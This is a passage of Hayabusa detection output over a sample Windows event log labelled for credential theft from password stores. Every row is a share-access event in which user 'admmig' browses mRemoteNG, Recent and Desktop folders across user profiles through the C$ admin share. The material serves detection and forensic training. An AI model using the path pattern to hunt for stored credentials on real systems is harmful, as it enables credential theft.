+2021-12-12 11:53:30.295 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.311 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.311 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.311 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.327 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.327 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.327 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.343 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.343 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.343 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.359 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.359 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.359 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.374 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.374 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.374 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.374 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.390 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.390 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.390 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.406 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.406 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.406 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.422 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.422 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.422 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.437 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.437 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.437 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.453 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.453 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.453 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.468 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.468 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.468 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.484 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.486 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.486 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.486 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.505 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.507 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.507 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.507 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.523 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.526 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.526 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.526 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.542 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.542 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.542 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.558 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.561 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.561 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\baretail - Shortcut.lnk | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.592 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.592 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.592 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.608 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.608 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\night.bat | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.623 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.623 